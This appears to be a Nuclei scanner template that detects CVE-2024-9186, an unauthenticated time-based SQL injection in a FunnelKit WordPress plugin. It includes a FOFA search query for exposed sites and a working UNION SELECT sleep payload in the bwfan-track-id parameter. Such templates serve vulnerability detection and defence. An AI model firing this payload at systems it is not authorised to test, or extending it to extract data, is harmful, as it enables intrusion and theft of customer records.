id: CVE-2024-9186 info: name: Automation By Autonami < 3.3.0 - SQL Injection author: s4e-io severity: high description: | The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit WordPress plugin before 3.3.0 does not sanitize and escape the bwfan-track-id parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks. impact: | Unauthenticated attackers can exploit time-based SQL injection through the bwfan-track-id parameter to extract sensitive database information including user credentials, email addresses, WooCommerce customer data, and marketing automation information. remediation: | Fixed in 3.3.0 reference: - https://wpscan.com/vulnerability/fab29b59-7e87-4289-88dd-ed5520260c26/ - https://nvd.nist.gov/vuln/detail/CVE-2024-9186 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-89 cve-id: CVE-2024-9186 epss-score: 0.02241 epss-percentile: 0.80633 metadata: verified: true max-request: 2 vendor: funnelkit product: wp-marketing-automations framework: wordpress fofa-query: body="wp-content/plugins/wp-marketing-automations/" tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,wp-marketing-automations,time-based-sqli,vuln flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body, "/wp-content/plugins/wp-marketing-automations")' - "status_code == 200" condition: and internal: true - raw: - | @timeout 20s GET /?bwfan-track-id=test%27%20UNION%20SELECT%201%2C1%2C%27%27%2CNOW()%2CNOW()%2C1%2C%27%27%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C%27%27%2CNOW()%2C%27%27%2CNOW()%2C1%2C1%2Csleep(7)%23&bwfan-track-action=click HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "duration>=7" - "status_code == 200" condition: and # digest: 4b0a0048304602210099cd7c2ef53e12eabdca5b6c9622bdbe52aac07732121f13a4b3af47d670b7490221008b0373c7c67252c2e5e10005e155315baaa4942946d8d97182f68652403c86c9:922c64590222798bb761d5b6d8e72950